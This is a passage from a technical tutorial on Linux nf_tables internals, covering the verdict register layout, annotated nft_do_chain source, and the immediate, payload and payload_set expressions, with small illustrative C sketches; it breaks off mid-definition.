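<p>With <code class="language-plaintext highlighter-rouge">sk_demo(SK_JUMP)</code> execution returns to the base chain and hits the drop rule, whereas with <code class="language-plaintext highlighter-rouge">sk_demo(SK_GOTO)</code> the drop rule is never reached because nothing was pushed onto the stack.</p>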

<p>However, the internal structure of the verdict register is, I fear, a little bit more confusing.
As we said, it is <code class="language-plaintext highlighter-rouge">16 bytes</code>. The first <em>4 bytes</em> are the actual <strong>verdict</strong>. Those 4 bytes take the codes we just talked about.
The other <code class="language-plaintext highlighter-rouge">12 bytes</code> are used if the verdict is <code class="language-plaintext highlighter-rouge">NFT_JUMP</code> or <code class="language-plaintext highlighter-rouge">NFT_GOTO</code> and they point to the other chain.</p>
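<p>One way to picture this layout is a union in which the verdict overlays the start of the register buffer. The sketch below assumes exactly that and uses hypothetical <code class="language-plaintext highlighter-rouge">sk_</code> names; on a typical 64-bit build the chain pointer occupies 8 of the remaining 12 bytes and the rest is padding.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

struct sk_chain; /* opaque here; only a pointer to it is stored */

struct sk_verdict {
	uint32_t code;          /* the 4 byte verdict code */
	struct sk_chain *chain; /* target chain, meaningful for jump and goto */
};

#define SK_REG32_NUM 20 /* 4 words of verdict register + 16 data words */

struct sk_regs {
	union {
		uint32_t data[SK_REG32_NUM];
		struct sk_verdict verdict;
	};
};

/* The verdict has to fit into the first 16 bytes of the buffer. */
static_assert(sizeof(struct sk_verdict) <= 16, "verdict larger than 16 bytes");

/* Write a verdict code and read it back through the raw word view. */
static uint32_t sk_word0_after_verdict(uint32_t code)
{
	struct sk_regs regs;

	memset(&regs, 0, sizeof(regs));
	regs.verdict.code = code;
	return regs.data[0];
}
```

<p>The whole structure is 80 bytes, and the verdict code is simply the first 4 byte word of it, which is why it helps to think of the registers as one continuous buffer.</p>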

<h2 id="taking-a-quick-look-at-nft_do_chain-">Taking a quick look at nft_do_chain <a name="quicklook"></a></h2>
<p>We have now established what the main building blocks are - expressions, rules, chains and tables - and talked a bit about how the execution flow is controlled through verdicts. Let’s now take a look at <code class="language-plaintext highlighter-rouge">nft_do_chain</code> - the function that goes through the rules in a chain and executes their expressions. The snippet below contains the code of the function with some added comments to explain its behavior.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span>
<span class="nf">nft_do_chain</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">priv</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span> <span class="o">*</span><span class="n">chain</span> <span class="o">=</span> <span class="n">priv</span><span class="p">,</span> <span class="o">*</span><span class="n">basechain</span> <span class="o">=</span> <span class="n">chain</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_rule_dp</span> <span class="o">*</span><span class="n">rule</span><span class="p">,</span> <span class="o">*</span><span class="n">last_rule</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span> <span class="o">=</span> <span class="n">nft_net</span><span class="p">(</span><span class="n">pkt</span><span class="p">);</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span> <span class="o">*</span><span class="n">last</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_regs</span> <span class="n">regs</span> <span class="o">=</span> <span class="p">{};</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">stackptr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_jumpstack</span> <span class="n">jumpstack</span><span class="p">[</span><span class="n">NFT_JUMP_STACK_SIZE</span><span class="p">];</span>
	<span class="n">bool</span> <span class="n">genbit</span> <span class="o">=</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">net</span><span class="o">-&gt;</span><span class="n">nft</span><span class="p">.</span><span class="n">gencursor</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">nft_rule_blob</span> <span class="o">*</span><span class="n">blob</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_traceinfo</span> <span class="n">info</span><span class="p">;</span>

	<span class="n">info</span><span class="p">.</span><span class="n">trace</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">static_branch_unlikely</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_trace_enabled</span><span class="p">))</span>
		<span class="n">nft_trace_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">,</span> <span class="n">basechain</span><span class="p">);</span>
<span class="nl">do_chain:</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">genbit</span><span class="p">)</span>
		<span class="n">blob</span> <span class="o">=</span> <span class="n">rcu_dereference</span><span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">blob_gen_1</span><span class="p">);</span>
	<span class="k">else</span>
		<span class="n">blob</span> <span class="o">=</span> <span class="n">rcu_dereference</span><span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">blob_gen_0</span><span class="p">);</span>

	<span class="n">rule</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_rule_dp</span> <span class="o">*</span><span class="p">)</span><span class="n">blob</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
	<span class="cm">/* we get the last rule so we know when to stop the processing */</span>
	<span class="n">last_rule</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">blob</span><span class="o">-&gt;</span><span class="n">data</span> <span class="o">+</span> <span class="n">blob</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">;</span>
<span class="nl">next_rule:</span> <span class="c1">// this section is executed every time there is a rule</span>
	<span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">=</span> <span class="n">NFT_CONTINUE</span><span class="p">;</span> <span class="c1">// the default verdict code = NFT_CONTINUE</span>
	<span class="k">for</span> <span class="p">(;</span> <span class="n">rule</span> <span class="o">&lt;</span> <span class="n">last_rule</span><span class="p">;</span> <span class="n">rule</span> <span class="o">=</span> <span class="n">nft_rule_next</span><span class="p">(</span><span class="n">rule</span><span class="p">))</span> <span class="p">{</span> <span class="c1">// iterate through the rules</span>
		<span class="cm">/* iterate through the expressions */</span>
		<span class="n">nft_rule_dp_for_each_expr</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="n">last</span><span class="p">,</span> <span class="n">rule</span><span class="p">)</span> <span class="p">{</span>
			<span class="c1">// execute the expression</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_cmp_fast_ops</span><span class="p">)</span>
				<span class="n">nft_cmp_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_cmp16_fast_ops</span><span class="p">)</span>
				<span class="n">nft_cmp16_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_bitwise_fast_ops</span><span class="p">)</span>
				<span class="n">nft_bitwise_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">!=</span> <span class="o">&amp;</span><span class="n">nft_payload_fast_ops</span> <span class="o">||</span>
				 <span class="o">!</span><span class="n">nft_payload_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">))</span>
				<span class="n">expr_call_ops_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">);</span>
			<span class="cm">/* if the code is anything but continue stop going through the expressions in that rule */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">!=</span> <span class="n">NFT_CONTINUE</span><span class="p">)</span> 
				<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="cm">/* section where it makes decisions what to do based on verdict */</span>
		<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="p">{</span> 
		<span class="k">case</span> <span class="n">NFT_BREAK</span><span class="p">:</span> 
			<span class="c1">// if NFT_BREAK -&gt; set verdict back to continue and continue</span>
			<span class="c1">// with the next rule on the chain</span>
			<span class="c1">// NFT_BREAK just stops execution of the expressions in one rule</span>
			<span class="c1">// and skips the rest of the expressions in the rule</span>
			<span class="c1">// after that it continues down the rules normally as if NFT_CONTINUE</span>
			<span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">=</span> <span class="n">NFT_CONTINUE</span><span class="p">;</span>
			<span class="n">nft_trace_copy_nftrace</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">);</span>
			<span class="k">continue</span><span class="p">;</span>
		<span class="k">case</span> <span class="n">NFT_CONTINUE</span><span class="p">:</span>
			<span class="c1">// if we hit this that means we went through all the expressions</span>
			<span class="c1">// if NFT_CONTINUE -&gt; we successfully went through the expressions </span>
			<span class="c1">// in the rule and we can continue to the next rule</span>
			<span class="n">nft_trace_packet</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">chain</span><span class="p">,</span> <span class="n">rule</span><span class="p">,</span>
					 <span class="n">NFT_TRACETYPE_RULE</span><span class="p">);</span>
			<span class="k">continue</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="cm">/* If not NFT_BREAK and not NFT_CONTINUE we know we will be exiting the chain */</span>
		<span class="cm">/* no more rules will be checked in that chain */</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">nft_trace_verdict</span><span class="p">(</span><span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">chain</span><span class="p">,</span> <span class="n">rule</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>

	<span class="cm">/* We hit the switches below after we finish with a chain */</span>
	<span class="cm">/* could be through a graceful exit or through a verdict prematurely set */</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">&amp;</span> <span class="n">NF_VERDICT_MASK</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NF_ACCEPT</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_DROP</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_QUEUE</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_STOLEN</span><span class="p">:</span>
		<span class="c1">// if NF_ACCEPT, NF_DROP, NF_QUEUE or NF_STOLEN we just exit the function</span>
		<span class="c1">// returning the verdict to the caller </span>
		<span class="k">return</span> <span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="cm">/* This switch is responsible for the -control flow- */</span>
	<span class="cm">/* It determines through the verdict what to do with the execution */</span>
	<span class="cm">/* Here JUMPs and GOTOs are performed */</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NFT_JUMP</span><span class="p">:</span> 
		<span class="cm">/* If NFT_JUMP we just set up stuff for a jump - expecting to return */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">stackptr</span> <span class="o">&gt;=</span> <span class="n">NFT_JUMP_STACK_SIZE</span><span class="p">))</span>
			<span class="k">return</span> <span class="n">NF_DROP</span><span class="p">;</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">chain</span> <span class="o">=</span> <span class="n">chain</span><span class="p">;</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">rule</span> <span class="o">=</span> <span class="n">nft_rule_next</span><span class="p">(</span><span class="n">rule</span><span class="p">);</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">last_rule</span> <span class="o">=</span> <span class="n">last_rule</span><span class="p">;</span>
		<span class="n">stackptr</span><span class="o">++</span><span class="p">;</span>
		<span class="n">fallthrough</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">NFT_GOTO</span><span class="p">:</span>
		<span class="cm">/* If NFT_GOTO we just goto the other chain - not expecting to return */</span>
		<span class="c1">// the previous case fallsthrough to this one to perform the jump to another chain</span>
		<span class="c1">// while NFT_GOTO skips the preparation because it won't be returning to this chain</span>
		<span class="n">chain</span> <span class="o">=</span> <span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">chain</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">do_chain</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">NFT_CONTINUE</span><span class="p">:</span> <span class="c1">// if gone through the rules with no other verdict</span>
	<span class="k">case</span> <span class="n">NFT_RETURN</span><span class="p">:</span> <span class="c1">// if returned from a chain early</span>
		<span class="cm">/* If the case is NFT_CONTINUE or NFT_RETURN */</span>
		<span class="cm">/* work with that chain is finished */</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="nl">default:</span>
		<span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">nft_base_chain</span><span class="p">(</span><span class="n">basechain</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">policy</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="the-expressions-">The Expressions <a name="expressions2"></a></h2>
<p>As we said, expressions perform some action on packets or registers.</p>

<p>An important thing to talk about is the operations and structure of expressions.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_imm_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">type</span>		<span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_imm_type</span><span class="p">,</span> <span class="c1">// the expression type</span>
	<span class="p">.</span><span class="n">size</span>		<span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_immediate_expr</span><span class="p">)),</span>
	<span class="p">.</span><span class="n">eval</span>		<span class="o">=</span> <span class="n">nft_immediate_eval</span><span class="p">,</span> <span class="c1">// called when the expression is 'ran'</span>
	<span class="p">.</span><span class="n">init</span>		<span class="o">=</span> <span class="n">nft_immediate_init</span><span class="p">,</span> <span class="c1">// called when added with a rule</span>
	<span class="p">.</span><span class="n">activate</span>	<span class="o">=</span> <span class="n">nft_immediate_activate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">deactivate</span>	<span class="o">=</span> <span class="n">nft_immediate_deactivate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">destroy</span>	<span class="o">=</span> <span class="n">nft_immediate_destroy</span><span class="p">,</span>
	<span class="p">.</span><span class="n">dump</span>		<span class="o">=</span> <span class="n">nft_immediate_dump</span><span class="p">,</span>
	<span class="p">.</span><span class="n">validate</span>	<span class="o">=</span> <span class="n">nft_immediate_validate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">reduce</span>		<span class="o">=</span> <span class="n">nft_immediate_reduce</span><span class="p">,</span>
	<span class="p">.</span><span class="n">offload</span>	<span class="o">=</span> <span class="n">nft_immediate_offload</span><span class="p">,</span>
	<span class="p">.</span><span class="n">offload_action</span>	<span class="o">=</span> <span class="n">nft_immediate_offload_action</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Every time a rule is added, the <code class="language-plaintext highlighter-rouge">init</code> function of each of its expressions is called to make sure the data passed to the expression is valid. Whenever an expression is <em>run</em>, its <code class="language-plaintext highlighter-rouge">eval</code> function is called; this is the function that actually performs the expression's work. The remaining callbacks follow the same pattern.</p>
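<p>To make the split between <code class="language-plaintext highlighter-rouge">init</code> and <code class="language-plaintext highlighter-rouge">eval</code> concrete, here is a minimal userspace sketch of an operations table. It is not kernel code: every <code class="language-plaintext highlighter-rouge">demo_*</code> name is hypothetical, and the real <code class="language-plaintext highlighter-rouge">struct nft_expr_ops</code> callbacks take different arguments. It only shows the pattern of validating once when the rule is added and dispatching through a function pointer when the expression runs.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, heavily simplified stand-ins for the kernel types. */
struct demo_expr;

struct demo_expr_ops {
	/* validates user input once, when the rule is added */
	int  (*init)(struct demo_expr *expr, int arg);
	/* does the actual work, every time the expression is run */
	void (*eval)(const struct demo_expr *expr, unsigned int *reg);
};

struct demo_expr {
	const struct demo_expr_ops *ops;
	int value;
};

static int demo_imm_init(struct demo_expr *expr, int arg)
{
	if (arg < 0)
		return -1; /* reject invalid input before the rule is installed */
	expr->value = arg;
	return 0;
}

static void demo_imm_eval(const struct demo_expr *expr, unsigned int *reg)
{
	*reg = (unsigned int)expr->value;
}

static const struct demo_expr_ops demo_imm_ops = {
	.init = demo_imm_init,
	.eval = demo_imm_eval,
};

/* Attaches an ops table to an expression and runs its init callback. */
int demo_expr_add(struct demo_expr *expr, const struct demo_expr_ops *ops, int arg)
{
	expr->ops = ops;
	return ops->init(expr, arg);
}

/* Runs the expression: eval is reached only through the ops table. */
void demo_expr_run(const struct demo_expr *expr, unsigned int *reg)
{
	assert(expr->ops != NULL);
	expr->ops->eval(expr, reg);
}
```

<p>The fast-path checks in the chain evaluation loop compare <code class="language-plaintext highlighter-rouge">expr-&gt;ops</code> against known tables for the same reason: the ops pointer is what identifies the kind of expression.</p>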

<p>This is how each expression is <em>defined</em> in the codebase.
Let’s take a look at the most commonly used expressions and explain how they can be used.</p>

<h3 id="nft_immediate_expr-">nft_immediate_expr <a name="nft_immediate_expr"></a></h3>
<p>This expression is probably the simplest one. It takes constant data and puts it into the registers. That’s all it does.
It is most often used to set the verdict register.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_immediate_expr</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dlen</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It needs a <code class="language-plaintext highlighter-rouge">dreg</code> (the destination register) and a <code class="language-plaintext highlighter-rouge">dlen</code> (the destination length). The first parameter, <code class="language-plaintext highlighter-rouge">dreg</code>, is the register offset at which the data is going to be written. The second parameter, <code class="language-plaintext highlighter-rouge">dlen</code>, is the length in bytes of the data being written.</p>

<p>The constant data is passed in the parameter <code class="language-plaintext highlighter-rouge">data</code> of type <code class="language-plaintext highlighter-rouge">struct nft_data</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables.h */</span>
<span class="k">struct</span> <span class="n">nft_data</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>			<span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
		<span class="k">struct</span> <span class="n">nft_verdict</span>	<span class="n">verdict</span><span class="p">;</span>
	<span class="p">};</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
</code></pre></div></div>
<p>We can see that <code class="language-plaintext highlighter-rouge">nft_data</code> can hold either a verdict or 16 bytes of data.
So with <code class="language-plaintext highlighter-rouge">nft_immediate_expr</code> we can set a verdict or write up to 16 bytes of arbitrary data to the registers.</p>
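<p>As a rough illustration, the effect of evaluating an immediate expression can be modelled in userspace as a bounded copy into a register array. This is a sketch under assumptions, not the kernel implementation: the <code class="language-plaintext highlighter-rouge">demo_*</code> names are made up, the register file is modelled as 20 four-byte slots, <code class="language-plaintext highlighter-rouge">dreg</code> is treated as a plain slot index, and the verdict case is left out.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DEMO_REG32_NUM 20 /* assumption: 20 four-byte register slots */

struct demo_regs {
	uint32_t data[DEMO_REG32_NUM];
};

struct demo_immediate {
	uint32_t data[4]; /* up to 16 bytes of constant data */
	uint8_t  dreg;    /* destination slot index (4-byte units) */
	uint8_t  dlen;    /* number of bytes to copy */
};

/* Copies dlen bytes of constant data into the registers starting at dreg. */
void demo_immediate_eval(const struct demo_immediate *imm, struct demo_regs *regs)
{
	/* the kind of bounds an init-time check has to guarantee */
	assert(imm->dlen <= sizeof(imm->data));
	assert(imm->dreg * sizeof(uint32_t) + imm->dlen <= sizeof(regs->data));

	memcpy(&regs->data[imm->dreg], imm->data, imm->dlen);
}
```

<p>Writing 8 bytes at slot 4 fills slots 4 and 5 and leaves slot 6 untouched, which is why both the offset and the length must be validated together.</p>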

<h3 id="nft_payload-">nft_payload <a name="nft_payload"></a></h3>
<p>This expression is another essential one. It is used to copy from the packets to the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_payload</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first parameter here is <code class="language-plaintext highlighter-rouge">base</code>. Its type is <code class="language-plaintext highlighter-rouge">enum nft_payload_bases</code>, so let us take a look at it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter/nf_tables.h */</span>
<span class="cm">/**
 * enum nft_payload_bases - nf_tables payload expression offset bases
 *
 * @NFT_PAYLOAD_LL_HEADER: link layer header
 * @NFT_PAYLOAD_NETWORK_HEADER: network header
 * @NFT_PAYLOAD_TRANSPORT_HEADER: transport header
 * @NFT_PAYLOAD_INNER_HEADER: inner header / payload
 */</span>
<span class="k">enum</span> <span class="n">nft_payload_bases</span> <span class="p">{</span>
	<span class="n">NFT_PAYLOAD_LL_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_NETWORK_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_TRANSPORT_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_INNER_HEADER</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>So the bases we can use target headers at the different OSI layers.
The second parameter in <code class="language-plaintext highlighter-rouge">nft_payload</code> is <code class="language-plaintext highlighter-rouge">offset</code>. It defines the offset at which we start copying, <strong>relative</strong> to the base provided. For example, in the UDP header the destination port is 2 bytes from the start of the header, so to copy the destination port we would use the <code class="language-plaintext highlighter-rouge">NFT_PAYLOAD_TRANSPORT_HEADER</code> base and <code class="language-plaintext highlighter-rouge">offset = 2</code>.
The third parameter is <code class="language-plaintext highlighter-rouge">len</code>. It specifies the number of bytes we are going to copy.
The fourth parameter is <code class="language-plaintext highlighter-rouge">dreg</code>, which specifies the register we are going to copy to.
Let’s look at an example: if we want to copy the TCP checksum to the third <strong>small register</strong> (small = 4-byte one), we set the values of the expression to:</p>
<pre><code class="language-txt">base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 16 -&gt; the checksum is 16 bytes away from the start of the TCP header
len = 2 -&gt; the checksum is 2 bytes
dreg = NFT_REG32_02 (the small registers start from NFT_REG32_00)
</code></pre>
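<p>The TCP checksum example can be sketched in userspace as a bounds-checked copy from a header buffer into a register array. Everything named <code class="language-plaintext highlighter-rouge">demo_*</code> is hypothetical, the register file is modelled as 20 four-byte slots, and <code class="language-plaintext highlighter-rouge">dreg</code> is a plain slot index here rather than the numeric value of <code class="language-plaintext highlighter-rouge">NFT_REG32_02</code>. Zeroing the partially filled slot is an assumption of this model, made so that no stale bytes are left next to the copied data.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DEMO_REG32_NUM 20 /* assumption: 20 four-byte register slots */

struct demo_payload {
	uint8_t offset; /* byte offset relative to the chosen base header */
	uint8_t len;    /* number of bytes to copy */
	uint8_t dreg;   /* destination slot index (4-byte units) */
};

/* Copies len bytes from base + offset into the registers.
 * Returns 0 on success, -1 if the request leaves the header or the registers. */
int demo_payload_eval(const struct demo_payload *p,
		      const uint8_t *base, size_t base_len,
		      uint32_t regs[DEMO_REG32_NUM])
{
	assert(base != NULL && regs != NULL);

	if ((size_t)p->offset + p->len > base_len)
		return -1;
	if ((size_t)p->dreg * 4 + p->len > DEMO_REG32_NUM * 4)
		return -1;

	/* clear the last, partially filled slot before copying into it */
	if (p->len % 4)
		regs[p->dreg + p->len / 4] = 0;

	memcpy(&regs[p->dreg], base + p->offset, p->len);
	return 0;
}
```

<p>With <code class="language-plaintext highlighter-rouge">offset = 16</code>, <code class="language-plaintext highlighter-rouge">len = 2</code> and slot index 2, the two checksum bytes land at the start of the third slot and the remaining two bytes of that slot are zero.</p>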

<h3 id="nft_payload_set-">nft_payload_set <a name="nft_payload_set"></a></h3>
<p>This expression is the opposite of <code class="language-plaintext highlighter-rouge">nft_payload</code>. Instead of copying from the headers to the registers, we can use <code class="language-plaintext highlighter-rouge">nft_payload_set</code> to copy from the registers <strong>to</strong> the headers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables_core.h */</span>
<span class="k">struct</span> <span class="n">nft_payload_set</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_type</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>We provide a <code class="language-plaintext highlighter-rouge">base</code> which specifies what type of header we target (at what OSI level). The <code class="language-plaintext highlighter-rouge">offset</code> parameter specifies at what offset we are going to write relative to the beginning of the header and <code class="language-plaintext highlighter-rouge">len</code> shows how many bytes we are going to be copying from the registers to the packet. The last essential argument is <code class="language-plaintext highlighter-rouge">sreg</code> which holds the register offset from which we are going to copy <code class="language-plaintext highlighter-rouge">len</code> bytes.</p>

<p>We also have some <em>optional</em> checksum parameters.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter/nf_tables.h */</span>
<span class="cm">/**
 * enum nft_payload_csum_types - nf_tables payload expression checksum types
 *
 * @NFT_PAYLOAD_CSUM_NONE: no checksumming
 * @NFT_PAYLOAD_CSUM_INET: internet checksum (RFC 791)
 * @NFT_PAYLOAD_CSUM_SCTP: CRC-32c, for use in SCTP header (RFC 3309)
 */</span>
<span class="k">enum</span> <span class="n">nft_payload_csum_types</span> <span class="p">{</span>
	<span class="n">NFT_PAYLOAD_CSUM_NONE</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_CSUM_INET</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_CSUM_SCTP</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>This expression allows us to directly modify incoming packets before they reach the application layer, or outgoing ones before they leave the host. For example, it could be used to redirect packets to different addresses or ports.</p>

<h3 id="nft_cmp_expr-">nft_cmp_expr <a name="nft_cmp_expr"></a></h3>
<p>We are going to take a look at the comparison expression. It can be used to control the flow of the execution of expressions depending on if a condition is met.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_cmp_expr</span> <span class="p">{</span>
